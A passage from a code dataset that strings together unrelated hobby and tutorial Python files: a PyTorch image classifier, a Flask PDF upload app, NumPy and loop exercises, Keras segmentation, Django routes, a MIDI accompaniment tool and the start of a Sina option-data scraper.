torch.nn.Conv2d(\n input_channels, output_channels, kernel_size=3, padding=1, stride=stride\n ),\n torch.nn.GroupNorm(8, output_channels),\n torch.nn.ReLU(),\n torch.nn.Conv2d(output_channels, output_channels, kernel_size=3, padding=1),\n torch.nn.GroupNorm(8, output_channels),\n torch.nn.ReLU(),\n )\n self.downsample = torch.nn.Sequential(\n torch.nn.Conv2d(input_channels, output_channels, 1, stride=stride),\n torch.nn.GroupNorm(8, output_channels),\n )\n\n def forward(self, x):\n # w/ residual (downsample to match output of network)\n return self.net(x) + self.downsample(x)\n\n def __init__(\n self,\n layer_sizes=[32, 64, 128],\n input_channels=3,\n num_classes=6,\n padding=3,\n stride=2,\n dropout_rate=0.1,\n input_transforms=torchvision.transforms.Compose(\n [\n torchvision.transforms.Normalize(\n mean=[0.1688, 0.1590, 0.1803], std=[0.3746, 0.3657, 0.3845]\n )\n ]\n ),\n ):\n super().__init__()\n\n self.HEIGHT_DIM = 2\n self.WIDTH_DIM = 3\n self.input_transforms = input_transforms\n\n output_channels = 32\n layers = [\n torch.nn.Conv2d(\n input_channels, output_channels, kernel_size=7, padding=padding, stride=stride\n ),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=3, stride=stride, padding=1),\n ]\n\n for channels in layer_sizes:\n 
layers.append(self.Block(output_channels, channels, stride=stride))\n output_channels = channels\n\n self.layers = torch.nn.Sequential(*layers)\n self.classifier = torch.nn.Linear(output_channels, num_classes)\n self.classifier.weight.zero_\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n\n def forward(self, x):\n \"\"\"\n @x: Tensor((Batch,3,64,64))\n @return: Tensor((Batch,6))\n \"\"\"\n x = self.input_transforms(x)\n return self.classifier(\n self.dropout(self.layers(x).mean(dim=[self.HEIGHT_DIM, self.WIDTH_DIM]))\n )\n\n\ndef train(args):\n from os import path\n\n model = CNNClassifier()\n train_logger, valid_logger = None, None\n if args.log_dir is not None:\n train_logger = tb.SummaryWriter(path.join(args.log_dir, \"train\"), flush_secs=1)\n valid_logger = tb.SummaryWriter(path.join(args.log_dir, \"valid\"), flush_secs=1)\n\n model = model.to(device)\n\n loss_function = torch.nn.CrossEntropyLoss()\n optim = torch.optim.SGD(\n model.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=1e-4\n )\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optim, \"max\", patience=10)\n epochs = args.epochs\n\n train_data_loader = load_data(\n \"data/train\",\n img_transform=transforms.Compose(\n [\n transforms.ColorJitter(brightness=0.8, contrast=0.2, saturation=0.2, hue=0.1),\n transforms.RandomHorizontalFlip(p=0.6),\n transforms.RandomVerticalFlip(p=0.6),\n transforms.RandomCrop(64),\n transforms.ToTensor(),\n ]\n ),\n )\n valid_data_loader = load_data(\"data/valid\")\n\n if args.input_norm:\n compute_input_norm(train_data_loader)\n\n global_step = 0\n best_accuracy = 0.93\n for _ in range(epochs):\n model.train()\n for _, (train_features, train_labels) in enumerate(train_data_loader):\n train_features, train_labels = (\n train_features.to(device),\n train_labels.to(device),\n )\n forward_output = model(train_features)\n loss = loss_function(forward_output, train_labels)\n train_logger.add_scalar(\"train/loss\", loss, global_step)\n global_step += 1\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n train_logger.add_scalar(\n \"train/accuracy\", compute_accuracy(train_data_loader, model), global_step=global_step\n )\n validation_accuracy = compute_accuracy(valid_data_loader, model)\n valid_logger.add_scalar(\"valid/accuracy\", validation_accuracy, global_step=global_step)\n lr_scheduler.step(validation_accuracy)\n if validation_accuracy > best_accuracy:\n best_accuracy = validation_accuracy\n # save_model(model)\n\n # save_model(model)\n\n\ndef compute_accuracy(data_loader, model):\n model.eval()\n with torch.no_grad():\n train_accuracy = 0\n num_batches = 0\n for _, (train_features, train_labels) in enumerate(data_loader):\n train_features, train_labels = (\n train_features.to(device),\n train_labels.to(device),\n )\n num_batches += 1\n forward_output = model(train_features)\n train_accuracy += torch.sum(\n (\n train_labels == torch.argmax(torch.nn.Softmax(dim=1)(forward_output), dim=1)\n ).long()\n ) / len(train_labels)\n\n return train_accuracy / num_batches\n\n\ndef compute_input_norm(train_data_loader):\n x = torch.zeros(3)\n x_squared = torch.zeros(3)\n num_batches = 0.0\n for _, (train_features, _) in enumerate(train_data_loader):\n x += torch.mean(train_features, dim=[0, 2, 3])\n x_squared += torch.mean(torch.pow(train_features, 2), dim=[0, 2, 3])\n num_batches += 1.0\n mean = x / num_batches\n std_dev = torch.pow((x_squared / num_batches - torch.pow(mean, 2.0)), 0.5)\n print(mean)\n print(std_dev)\n\n\n# import argparse\n# parser = 
argparse.ArgumentParser()\n# parser.add_argument(\"-e\", \"--epochs\", default=1, type=int)\n# parser.add_argument(\"-lr\", \"--learning_rate\", default=0.01, type=float)\n# parser.add_argument(\"-inorm\", \"--input_norm\", default=False, type=bool)\n# parser.add_argument(\"-log\", \"--log_dir\", default=\"\")\n# args = parser.parse_args()\n# train(args)\n","repo_name":"matthibshman/deep-learning-projects","sub_path":"vision-applications/use-cases/image_classification.py","file_name":"image_classification.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6851807607","text":"import os\nimport PyPDF2\nfrom flask import Flask, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\n\nos.system(\"mkdir files\")\nUPLOAD_FOLDER = os.popen(\"pwd\").read().strip() + \"/files\"\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef read_data(filename):\n pdfFileObj = open('files/' + filename, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n number_of_pages = pdfReader.getNumPages()\n for page_number in range(number_of_pages): \n page = pdfReader.getPage(page_number).extractText().split(\" \") \n \n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('uploaded_file',\n filename=filename))\n return '''\n <!doctype html>\n <title>Upload new File\n

</title>\n    <h1>Upload new File</h1>\n    <form method=post enctype=multipart/form-data>\n      <input type=file name=file>\n      <input type=submit value=Upload>\n    </form>
\n '''\n\nfrom flask import send_from_directory\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n read_data(filename)\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"VibAltekar/akhillinit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70854365559","text":"#!python3\n\n# write two functions that convert fahrenheit to celsius and back\n# Tc=(5/9)*(Tf-32)\n# Tf=(9/5)*Tc+32\n\n\ndef main():\n printer()\n amount()\n\n\ndef printer():\n print(\"#\" * 40)\n print(\"\\t\\t Temperature Converter\")\n print(\"#\" * 40)\n\n\ndef to_celsius(n):\n n = (5 / 9) * (n - 32)\n print(f\"Celsius: {n}\")\n\n\ndef to_fahrenheit(n):\n n = (9 / 5) * n + 32\n print(f\"Fahrenheit: {n}\")\n\n\ndef amount():\n temp = int(input(\"What temp?: \"))\n # temp = float(temp)\n print(\"Type 1. for Fahrenheit, and 2. for Celsius. Enter to Quit\")\n what = input(\" 1. or 2. >>\")\n\n if what == \"1\":\n to_fahrenheit(temp)\n elif what == \"2\":\n to_celsius(temp)\n else:\n print(\"Exiting..\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"danielmichaels/databank","sub_path":"scripts/temperature_converter.py","file_name":"temperature_converter.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28070713135","text":"\n\n# while loop\n\n# Repeat body until condition is not true\n# else clause is run if the body of the loop is never executed,\ncount = 5\n\nwhile count:\n print(count, end=\", \")\n count -= 1\nelse:\n print(\"Can't count\")\n\n# find 3\ncount = 0\nwhile True:\n count += 1\n if count == 3:\n break\n\n\n\"\"\"\nfor target in object: # Assign object items to target\n statements\nif test: break # exit repetition\nif test: continue # skip this iteration\nelse: # execute if for loop body never executes\nstatements\n\"\"\"\n\n\n# else clause\nfor index in range(0):\n print(index)\nelse:\n print(\"None evaluated\")\n\n# print event numbers\nfor number in range(0, 5):\n if number % 2 != 0:\n continue\n print(number, end=\", \")\n\n# for index in range(5):\n# print(index)\n#\n# for index in range(2, 5, 2):\n# print(index)\n\n# list = [5, 4, 6, 7]\n\n# for index in range(len(list)):\n# print(list[index], end=\"\")\n\n# for element in list:\n# print(element, end=\"\")\n\n\n# grocery_list = {\"bacon\": 3.99, \"egg\": 2.99, \"bread\": 1.99}\n#\n# for item in grocery_list:\n# print(item, end=\", \")\n#\n# for item in grocery_list.keys():\n# print(item, end=\",\")\n#\n# for price in grocery_list.values():\n# print(price, end=\", \")\n#\n# for item, price in grocery_list.items():\n# print(item, \":\", price, end=\", \")\n\n","repo_name":"darrylweimers/python-3","sub_path":"tutorials/loop/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17766711177","text":"# IMPORT PYTHON LIBRARIES\nimport sys\n\n\n# IMPORT MIR LIBRARIES\nsys.path.append('../lib')\nimport librosa\nimport pymir\nimport midiutil\n\n\n# IMPORT OUR MIR FUNCTIONS\nsys.path.append('functions')\nimport utils\nimport dictionaries\nimport beatDetection\nimport chordPrediction\nimport midiConversion\nimport midiFileCreation\n\n\nshow_diagnostics, settings, save = 
utils.set_defaults()\nprint(\t'\\nWelcome to Play With Yourself Music Accompaniment Tool.'\n\t\t'\\nType help for a list of valid commands')\n\nwhile(True):\n\tcmd = raw_input('\\nWhat would you like to do?\\n')\n\tcmd, show_diagnostics, settings, save = utils.process_command(cmd, show_diagnostics, settings, save);\n\tif (cmd == 'load_yes'):\n\t\tUI_instrument_notes = int(settings['inst1']);\t\t\tUI_onset_threshold = float((10-int(settings['busy']))/10.0);\n\t\tUI_instrument_chords = int(settings['inst2']);\t\t\tUI_dynamic_threshold = float(settings['dyn']/10.0);\n\t\tUI_instrument_beats = int(settings['inst3']);\t\t\tUI_beat_windowSize = float(settings['window']/10.0); #300 msec\n\t\tUI_beat_pattern = int(settings['pattern']);\t\t\t\tUI_chord_style = int(settings['style']);\n\t\tUI_time_signature = int(settings['timeSig']);\t\t\ty, sr = librosa.load(settings['filename'])\n\n\n\t\t# TRACK BEATS\n\t\tonsets, beats, volume_notes, times, tempo, msec_tempo = beatDetection.track_beats(y, sr, UI_onset_threshold, UI_dynamic_threshold, UI_beat_windowSize)\n\t\tbeatDetection.plot_beats_and_onsets(onsets, beats, times, show_diagnostics)\n\n\n\t\t# PREDICT CHORDS\n\t\tnotes, reg_notes, startTimes_notes, endTimes_notes, frameIndex_notes = chordPrediction.get_chords(settings['filename'], times[beats], times)\n\t\tchords, reg_chords, startTimes_chords, endTimes_chords, frameIndex_chords, volume_chords = midiConversion.determine_durations(list(notes), list(reg_notes), list(startTimes_notes), list(endTimes_notes), frameIndex_notes, list(volume_notes))\n\t\tchordPrediction.print_chords_and_times(chords, startTimes_chords, endTimes_chords, frameIndex_chords, times, show_diagnostics)\n\t\tstartTimes_beats, endTimes_beats, volume_beats = beatDetection.alter_beats(startTimes_notes, endTimes_notes, volume_notes, msec_tempo, UI_beat_windowSize, settings['speed'])\n\n\n\t\t# NOTES TO MIDI\n\t\tmidi_notes = midiConversion.convert_note_to_midi(notes, reg_notes)\n\t\tmidi_chords = midiConversion.convert_chord_to_midi(chords, reg_chords, UI_chord_style)\n\t\tmidi_beats = midiConversion.convert_beat_to_midi(notes, UI_beat_pattern, UI_time_signature, UI_instrument_beats, reg_notes, settings['speed'])\n\n\n\t\t# WRITE MIDI\n\t\tmidi_tracks = [midi_notes, midi_chords, midi_beats]\n\t\tstartTimes = [startTimes_notes, startTimes_chords, startTimes_beats]\n\t\tendTimes = [endTimes_notes, endTimes_chords, endTimes_beats]\n\t\tUI_instrument = [UI_instrument_notes, UI_instrument_chords, UI_instrument_beats]\n\t\tvolumes = [volume_notes, volume_chords, volume_beats]\n\t\tduration = [0]*len(midi_tracks); program = [0]*len(midi_tracks); volume = [0]*len(midi_tracks);\n\t\tfor i in range(len(midi_tracks)):\n\t\t\tduration[i], program[i], volume[i] = midiFileCreation.build_track(UI_instrument[i], midi_tracks[i], startTimes[i], endTimes[i], volumes[i], msec_tempo, UI_dynamic_threshold)\n\t\tmidiFileCreation.write_midi_file(settings['filename'], midi_tracks, program, duration, tempo[0], volume)\n\n\n\t\t# PREVIEW\n\t\tutils.preview(filename=settings['filename'],length=settings['preview'])\n\t\tutils.clean(filename=settings['filename'])\n","repo_name":"adarguy/playWithYourself","sub_path":"CLI/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32682602466","text":"from django.urls import path\n#now import the views.py file into this code\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('cleaner/<int:cleaner_id>/book/', views.book_cleaner, name='book_cleaner'),\n    path('payment/<int:booking_id>/', views.payment, name='payment'),\n    path('booked/<int:booking_id>/', views.booked, name='booked'),\n    path('payment/<int:booking_id>/', views.payment, name='payment'),\n    path('webhook/stripe/', views.stripe_webhook, name='stripe_webhook'),\n    path('profile/<str:username>', views.profile, name='profile'),\n    path('<str:username>/signup', views.signup, name='signup'),\n    path('<str:username>/signin', views.signin, name='signin'),\n    path('logout', views.logout, name='logout'),\n]\n","repo_name":"Shobayosamuel/SweepConnect","sub_path":"sweepconnect/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24712718815","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, Dropout, Softmax\n\nfrom tensorflow.keras.layers import Input, concatenate, UpSampling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import layers\n#from models.FPN\n\nINPUT_DEPTH = 5\nINPUT_HEIGHT = 64\nINPUT_WIDTH = 1024\n\nclass Sem_Seg_Head(Model):\n    def __init__(self):\n        super(Sem_Seg_Head, self).__init__()\n        self.dropout = Dropout(rate=0.01)\n        self.conv = Conv2D(filters=20, kernel_size=3, strides=1, padding='same', data_format='channels_last')\n        self.sem_softmax = Softmax(axis=3) \n\n    def call(self, x):\n        y = self.dropout(x)\n        y = self.conv(y)\n        y = self.sem_softmax(y)\n        return y\n\nif __name__ == '__main__':\n    sem_seg_head = Sem_Seg_Head()\n    sem_seg_head.build(input_shape=(None, 32, 64, 1024))\n    sem_seg_head.call(Input(shape=(32, 64, 1024)))\n    sem_seg_head.summary()\n","repo_name":"swagholikar29/Panoptic-Segmentation","sub_path":"scripts/models/Semantic_Segmentation_Head.py","file_name":"Semantic_Segmentation_Head.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71146572282","text":"#a = np.array([4, 10, 12, 23, -2, -1, 0, 0, 0, -6, 3, -7])\n# 1. How many negative numbers are there?\nimport numpy as np\na = np.array([4, 10, 12, 23, -2, -1, 0, 0, 0, -6, 3, -7])\nis_a_negative = a[a < 0]\nprint (len(is_a_negative))\n\n# 2. How many positive numbers are there?\nis_a_positive = a[a > 0]\nprint(len(is_a_positive))\n\n# 3. How many even positive numbers are there?\nis_a_positive_and_even = is_a_positive[is_a_positive % 2 == 0]\nprint(len(is_a_positive_and_even))\n\n# 4. If you were to add 3 to each data point, how many positive numbers would there be?\na_plus_three = a + 3\na_plus_three_is_positive = a_plus_three[a_plus_three > 0]\nprint(len(a_plus_three_is_positive))\n\n# 5. If you squared each number, what would the new mean and standard deviation be?\na_squared = a ** 2\nprint(a_squared.mean())\nprint(a_squared.std())\n\n# 6. A common statistical operation on a dataset is centering. \n# This means to adjust the data such that the center of the data is at 0. \n# This is done by subtracting the mean from each data point. Center the data set.\na_centered = a - a.mean()\nprint(a_centered)\n\n# 7. Calculate the z-score for each data point. 
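# (Added note: a z-score rescales each centered value by the standard deviation,
#  z_i = (a_i - mean(a)) / std(a); a_centered above already subtracted the mean,
#  so dividing by a.std() is enough, and the result has mean 0 and std 1.)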
\na_zscore = a_centered / a.std()\nprint(a_zscore)\n\n\n\n\n\n\n\n\n## Setup 1\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# Use python's built in functionality/operators to determine the following:\n# Exercise 1 - Make a variable called sum_of_a to hold the sum of all the numbers in above list\nsum_of_a = sum(a)\n\n# Exercise 2 - Make a variable named min_of_a to hold the minimum of all the numbers in the above list\nmin_of_a = min(a)\n\n# Exercise 3 - Make a variable named max_of_a to hold the max number of all the numbers in the above list\nmax_of_a = max(a)\n\n# Exercise 4 - Make a variable named mean_of_a to hold the average of all the numbers in the above list\nmean_of_a = sum(a)/len(a)\n\n# Exercise 5 - Make a variable named product_of_a to hold the product of multiplying all the numbers in the above list together\nproduct_of_a = a[0]\nfor n in a:\n product_of_a = product_of_a * n\nprint(product_of_a)\n\n# Exercise 6 - Make a variable named squares_of_a. It should hold each number in a squared like [1, 4, 9, 16, 25...]\nsquares_of_a = []\nfor n in a:\n squares_of_a.append(n**2)\nprint(squares_of_a)\n\n# Exercise 7 - Make a variable named odds_in_a. It should hold only the odd numbers\nodds_in_a = []\nfor n in a:\n if n % 2 != 0:\n odds_in_a.append(n)\nprint(odds_in_a)\n\n# Exercise 8 - Make a variable named evens_in_a. It should hold only the evens.\nevens_in_a = []\nfor n in a:\n if n % 2 == 0:\n evens_in_a.append(n)\nprint(evens_in_a)\n\n\n\n\n\n\n\n\n## What about life in two dimensions? A list of lists is matrix, a table, a spreadsheet, a chessboard...\n## Setup 2: Consider what it would take to find the sum, min, max, average, sum, product, and list of squares for this list of two lists.\nb = [\n [3, 4, 5],\n [6, 7, 8]\n]\nb= np.array(b)\n\n# Exercise 1 - refactor the following to use numpy. Use sum_of_b as the variable. **Hint, you'll first need to make sure that the \"b\" variable is a numpy array**\nsum_of_b = 0\nfor row in b:\n sum_of_b += sum(row)\n\nsum_of_b = np.sum(b)\n\nprint(sum_of_b)\n\n# Exercise 2 - refactor the following to use numpy. 
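# (Added note: np.min and the other numpy reducers collapse the whole array by
#  default; pass axis=0 or axis=1 to reduce per-column or per-row instead. For
#  the b defined above, np.min(b, axis=0) gives array([3, 4, 5]) and
#  np.min(b, axis=1) gives array([3, 6]).)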
\nmin_of_b = min(b[0]) if min(b[0]) <= min(b[1]) else min(b[1]) \n\nmin_of_b = np.min(b) \n\nprint(min_of_b)\n\n# Exercise 3 - refactor the following maximum calculation to find the answer with numpy.\nmax_of_b = max(b[0]) if max(b[0]) >= max(b[1]) else max(b[1])\n\nmax_of_b = np.max(b)\n\nprint(max_of_b)\n\n# Exercise 4 - refactor the following using numpy to find the mean of b\nmean_of_b = (sum(b[0]) + sum(b[1])) / (len(b[0]) + len(b[1]))\n\nmean_of_b = np.mean(b)\n\nprint(mean_of_b)\n\n# Exercise 5 - refactor the following to use numpy for calculating the product of all numbers multiplied together.\nproduct_of_b = 1\nfor row in b:\n for number in row:\n product_of_b *= number\n\nproduct_of_b = np.prod(b)\n\nprint(product_of_b)\n\n# Exercise 6 - refactor the following to use numpy to find the list of squares \nsquares_of_b = []\nfor row in b:\n for number in row:\n squares_of_b.append(number**2)\n\nsquares_of_b = b ** 2\n\nprint(squares_of_b)\n\n\n# Exercise 7 - refactor using numpy to determine the odds_in_b\nodds_in_b = []\nfor row in b:\n for number in row:\n if(number % 2 != 0):\n odds_in_b.append(number)\n\nodds_in_b = b[b % 2 != 0]\n\nprint(odds_in_b)\n\n\n# Exercise 8 - refactor the following to use numpy to filter only the even numbers\nevens_in_b = []\nfor row in b:\n for number in row:\n if(number % 2 == 0):\n evens_in_b.append(number)\n\nevens_in_b = b[b % 2 == 0]\n\nprint(evens_in_b)\n\n# Exercise 9 - print out the shape of the array b.\nprint(b.shape)\n\n# Exercise 10 - transpose the array b.\nprint(np.transpose(b))\n\n# Exercise 11 - reshape the array b to be a single list of 6 numbers. (1 x 6)\nprint(np.reshape(b, (1,6)))\n\n# Exercise 12 - reshape the array b to be a list of 6 lists, each containing only 1 number (6 x 1)\nprint(np.reshape(b, (6,1)))\n\n\n\n\n\n\n\n\n\n## Setup 3\nc = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\nc = np.array(c)\n\n# HINT, you'll first need to make sure that the \"c\" variable is a numpy array prior to using numpy array methods.\n# Exercise 1 - Find the min, max, sum, and product of c.\nprint(c.min())\nprint(c.max())\nprint(c.sum())\nprint(np.prod(c))\n\n# Exercise 2 - Determine the standard deviation of c.\nprint(c.std())\n\n# Exercise 3 - Determine the variance of c.\nprint(c.var())\n\n# Exercise 4 - Print out the shape of the array c\nprint(np.shape(c))\n\n# Exercise 5 - Transpose c and print out transposed result.\ntranspose_c = c.transpose()\nprint(transpose_c)\n\n# Exercise 6 - Multiply c by the c-Transposed and print the result.\nc_product = c * transpose_c\nprint(c_product)\n\n# Exercise 7 - Write the code necessary to sum up the result of c times c transposed. Answer should be 261\nsum_c = sum(c * transpose_c)\nprint(sum(sum_c))\n\n# Exercise 8 - Write the code necessary to determine the product of c times c transposed. 
Answer should be 131681894400.\nprint(np.prod(c_product))\n\n\n\n\n\n\n\n\n## Setup 4\nd = [\n [90, 30, 45, 0, 120, 180],\n [45, -90, -30, 270, 90, 0],\n [60, 45, -45, 90, -45, 180]\n]\nd = np.array(d)\n\n# Exercise 1 - Find the sine of all the numbers in d\nprint(np.sin(d))\n\n# Exercise 2 - Find the cosine of all the numbers in d\nprint(np.cos(d))\n\n# Exercise 3 - Find the tangent of all the numbers in d\nprint(np.tan(d))\n\n# Exercise 4 - Find all the negative numbers in d\nd_negatives = d[d < 0]\nprint(d_negatives)\n\n# Exercise 5 - Find all the positive numbers in d\nd_positives = d[ d> 0]\nprint(d_positives)\n\n# Exercise 6 - Return an array of only the unique numbers in d.\nprint(np.unique(d))\n\n# Exercise 7 - Determine how many unique numbers there are in d.\nprint(len(np.unique(d)))\n\n# Exercise 8 - Print out the shape of d.\nprint(np.shape(d))\n\n# Exercise 9 - Transpose and then print out the shape of d.\nprint(np.transpose(d).shape)\n\n# Exercise 10 - Reshape d into an array of 9 x 2\nprint(np.reshape(d,(9,2)))\n\n\n\n\n","repo_name":"davidtenorio1/python-exercises","sub_path":"4.7_numpy_exercises.py","file_name":"4.7_numpy_exercises.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9884031950","text":"par1 = eval(input(\"Enter the height of the triangle:\\n\") )\r\npar2 = '*'\r\n\r\ngap=(par1+par1-1)//2\r\nfor i in range(0,par1+par1-1,2):\r\n print(' '*gap, end='')\r\n print(par2*(i+1))\r\n gap=gap-1\r\n \r\n#Author: Lenard Carroll\r\n#Student Number: CRRLEN001","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/crrlen001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29317904667","text":"import glob\r\nimport time\r\n\r\nimport sys\r\nimport cv2\r\nimport os\r\n\r\nstderr = sys.stderr\r\nsys.stderr = open(os.devnull, 'w')\r\nimport tensorflow.keras as keras\r\nsys.stderr = stderr\r\n\r\nimport tensorflow as tf\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Fuck you tensorflow\r\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\n\r\nimport numpy as np\r\n\r\n\r\ndef predict(image, height=224, width=224):\r\n # im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n im = image\r\n\r\n im = im / 255\r\n im = cv2.resize(im, (height, width))\r\n im = im.reshape((1,) + im.shape)\r\n \r\n pred = model.predict(im)\r\n \r\n mask = pred.reshape((224, 224))\r\n\r\n return mask\r\n\r\ndef blackout(image, mask):\r\n mask[mask > 0.5] = 255\r\n mask[mask <= 0.5] = 0\r\n\r\n mask = cv2.resize(mask, (image.shape[1], image.shape[0]))\r\n mask_n = np.zeros_like(image)\r\n mask_n[:, :, 0] = mask\r\n mask_n[:, :, 1] = mask\r\n mask_n[:, :, 2] = mask\r\n\r\n # print(mask_n.shape)\r\n # print(img.shape)\r\n\r\n alpha = 0.8\r\n beta = (1.0 - alpha)\r\n dst = cv2.bitwise_and(image, mask_n)\r\n\r\n return dst\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # model = keras.models.load_model('models/hairnet_matting.hdf5')\r\n fileName = sys.argv[1]\r\n\r\n model = keras.models.load_model('./segModel/checkpoint.hdf5')\r\n\r\n img = cv2.imread(fileName)\r\n\r\n mask = predict(img)\r\n\r\n d1 = time.time()\r\n dst = blackout(img, mask)\r\n\r\n cv2.imwrite(sys.argv[2], 
dst)\r\n","repo_name":"ChesterJFGould/FaceHairNet","sub_path":"modelGen/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"43480762801","text":"\"\"\"\nAuthor: shifulin\nEmail: shifulin666@qq.com\n\"\"\"\n# python3\n\nfrom time import sleep\nfrom threading import Thread, Lock\n\nfrom requests import get, exceptions\nfrom numpy import polyfit, polyval, meshgrid, array, nan\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport sina_etf_option_api\n\n\nhttp_header = {\n 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/97.0.4692.71 Safari/537.36\",\n 'Referer': \"https://stock.finance.sina.com.cn/\",\n}\n\nCOLORS = ['blue', 'yellow', 'lime', 'red', 'purple', 'slategray', 'tomato', 'orange', 'darkred', 'aqua']\nglobal_ax_lines_call = [{'ax': None, 'lines': []} for _ in range(5)]\nglobal_ax_lines_put = [{'ax': None, 'lines': []} for _ in range(5)]\nupdate_picture_lock = Lock()\nELEV = 30\nAZIM = 120\n\n\ndef requests_get(all_codes):\n url = \"http://hq.sinajs.cn/list={codes}\".format(codes=all_codes)\n while True:\n try:\n data = get(url, headers=http_header).content.decode('gbk').strip().split('\\n')\n break\n except (exceptions.ConnectionError, exceptions.ConnectTimeout) as e:\n print('连接出错,10秒后重试')\n print(e)\n sleep(10)\n return [i.split(',') for i in data]\n\n\ndef get_codes(cate, exchange, underlying, dividend):\n while True:\n try:\n dates = sorted(sina_etf_option_api.get_option_dates(cate=cate, exchange=exchange))\n call, put = [], []\n for date in dates:\n call_codes, put_codes = sina_etf_option_api.get_option_codes(date, underlying=underlying)\n call.append(['CON_SO_' + i for i in call_codes])\n put.append(['CON_SO_' + i for i in put_codes])\n all_codes = ','.join([','.join(i) for i in call] + [','.join(i) for i in put])\n data = requests_get(all_codes)\n if dividend:\n codes_tmp = [i[0][11:26] for i in data] # 考虑分红\n else:\n codes_tmp = [i[0][11:26] for i in data if not i[0].endswith('A')] # 不考虑分红\n for i in range(len(call)):\n call[i] = [j for j in call[i] if j in codes_tmp]\n put[i] = [j for j in put[i] if j in codes_tmp]\n break\n except (exceptions.ConnectionError, exceptions.ConnectTimeout) as e:\n print('连接出错,10秒后重试')\n print(e)\n sleep(10)\n return call, put, ','.join(codes_tmp), dates\n\n\ndef get_data(call, put, all_codes):\n implied_volatility, strike_price, vega, theta, gamma, delta = [], [], [], [], [], []\n for line in requests_get(all_codes):\n implied_volatility.append(float(line[9]))\n vega.append(float(line[8]))\n strike_price.append(float(line[13]))\n theta.append(float(line[7]))\n gamma.append(float(line[6]))\n delta.append(float(line[5]))\n call_implied_volatility, call_strike_price, call_vega, call_theta, call_gamma, call_delta = [], [], [], [], [], []\n put_implied_volatility, put_strike_price, put_vega, put_theta, put_gamma, put_delta = [], [], [], [], [], []\n b = 0\n for i in call:\n len_i = len(i)\n call_implied_volatility.append(implied_volatility[b:b + len_i])\n call_strike_price.append(strike_price[b:b + len_i])\n call_vega.append(vega[b:b + len_i])\n call_theta.append(theta[b:b + len_i])\n call_gamma.append(gamma[b:b + len_i])\n call_delta.append(delta[b:b + len_i])\n b += len_i\n for i in put:\n len_i = len(i)\n put_implied_volatility.append(implied_volatility[b:b + len_i])\n 
